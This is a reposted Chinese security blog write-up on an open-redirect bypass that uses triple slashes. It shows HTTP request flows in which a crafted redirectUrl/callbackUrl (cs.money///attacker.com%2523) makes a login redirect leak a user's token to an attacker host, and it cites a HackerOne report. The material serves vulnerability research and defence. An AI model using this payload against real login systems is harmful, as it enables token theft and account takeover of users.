重定向绕过另类思路

admin
admin
admin
0
文章
0
评论
2026-05-07 05:07:21 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 该文档披露了一种利用三个斜杠构造URL的开放重定向绕过技术,攻击者通过篡改登录参数中的redirectUrl和callbackUrl,使浏览器将https://cs.money///attacker.com解析至恶意域名,从而在用户登录后窃取token。关键发现在于浏览器对多斜杠URL的异常解析机制,文章提供了完整的攻击流程示例并引用HackerOne漏洞报告作为佐证,建议开发者在重定向逻辑中实施严格的白名单校验。 综合评分: 78 文章分类: 漏洞分析,WEB安全,实战经验,渗透测试

cover_image

重定向绕过另类思路

原创

h1 h1

迪哥讲事

2026年5月5日 10:00 四川

在小说阅读器读本章

去阅读

正文

正常情况下的请求流程

  1. 用户点击登录
GET /login?redirectUrl=https://cs.money/dashboard&callbackUrl=https://cs.money/dashboard HTTP/1.1
Host: auth.dota.trade
  1. 登录成功后的重定向(服务端返回)
HTTP/1.1 302 Found
Location: https://cs.money/dashboard?token=USER_TOKEN
  1. 浏览器跳转
GET /dashboard?token=USER_TOKEN HTTP/1.1
Host: cs.money

存在漏洞时的请求流程(Open Redirect)

  1. 构造恶意登录 URL
GET /login?redirectUrl=https://cs.money///attacker.com%2523&callbackUrl=https://cs.money///attacker.com%2523 HTTP/1.1
Host: auth.dota.trade
  1. 登录成功后的响应
HTTP/1.1 302 Found
Location: https://cs.money///attacker.com#?token=USER_TOKEN
  1. 浏览器解析(关键点) 浏览器会把:
https://cs.money///attacker.com

解析为:

https://attacker.com
  1. 实际跳转请求
GET /#?token=USER_TOKEN HTTP/1.1
Host: attacker.com

这里重定向的思路就是添加三个斜杠—>///

主要做一个记录

假期最后一天,优惠还有

参考

https://hackerone.com/reports/905607

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:迪哥讲事 h1 h1《重定向绕过另类思路》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0